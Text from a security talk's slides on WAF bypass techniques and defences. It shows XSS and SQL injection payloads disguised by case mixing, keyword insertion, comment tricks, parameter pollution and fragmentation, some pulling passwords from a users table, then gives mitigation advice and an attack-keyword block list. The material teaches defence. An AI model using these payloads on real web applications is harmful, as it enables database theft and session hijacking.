Contact: [email protected] • Cyber security engineer • Programmer/developer • 13 years of work experience with pentest, codereview, development, incident detection, incident response and hardening.
Common attacks in WAF • Custom attacks to bypass WAF • Attack Mitigation in WAF • Attack Mitigation in application • Create your custom WAF • My OpenSource Projects • Attack and Protection!
Each WAF have a different context in response. • https://svn.nmap.org/nmap/scripts/http-waf-detect.nse • https://github.com/sandrogauci/wafw00f • http://code.google.com/p/imperva-detect/
requests and traffic that violate the WAF rule-sets. This is a useful feature, but needs to be used judiciously, an WAF that is in over-active blocking mode prevents legitimate traffic from reaching the Web server, making the application unusable. • Sometimes have a weak rules, that don’t match attacks to block.
is mixed case, here the big purpose is bypass absence of case sensitive rules. • SELECT, SeLect, selEcT… UnIOn, unIoN... • Look this following: • /sell/cars.php?search=<script>alert(document.cookie)</script> • /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
this resource erase critical points in attacks, but you can bypass this, you need a point to insert attack word between payload. • Look this following: • /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 • /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
validation in inputs, you can see this problem in fuzzing tests... • Look this following: • /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7… • id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...) +uNIoN+seLecT+2,3,version()...
conduct an attack: • /?id=1;select+4,5,6+from+users+where+id=1-- • This request will be successfully performed using HPP. • /?id=1;select+4&id=5,6+from+users+where+id=1-- • Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked
a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); • The following request doesn’t allow anyone to conduct an attack • /?a=1+union+select+1,2/* These requests is a possible attack using HPF • /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become • select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
• Prepared Statements (with Parameterized Queries). • Create a function that check a Block list with common words in attacks (eval,timeout,union,--, select, delete, version, benchmark, sleep, /**/...), set all string to lower case before scan pattern. • Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls in resources. • Follow Mitre and OWASP tricks to hardening etc...
raw sockets • Demultiplexer problems (select(), epoll(), kqueue(), pthreads(), MPI…) • Race conditions • Testing a lot list of libraries libuv(used by node) libevent(old lib for core of nginx) Python Twisted
Demultiplexer use select() with pthreads • Have a problem, race conditions in millions connections(lock with mutex cannot save). • Easy to understand • Github.com/CoolerVoid/RaptorWAF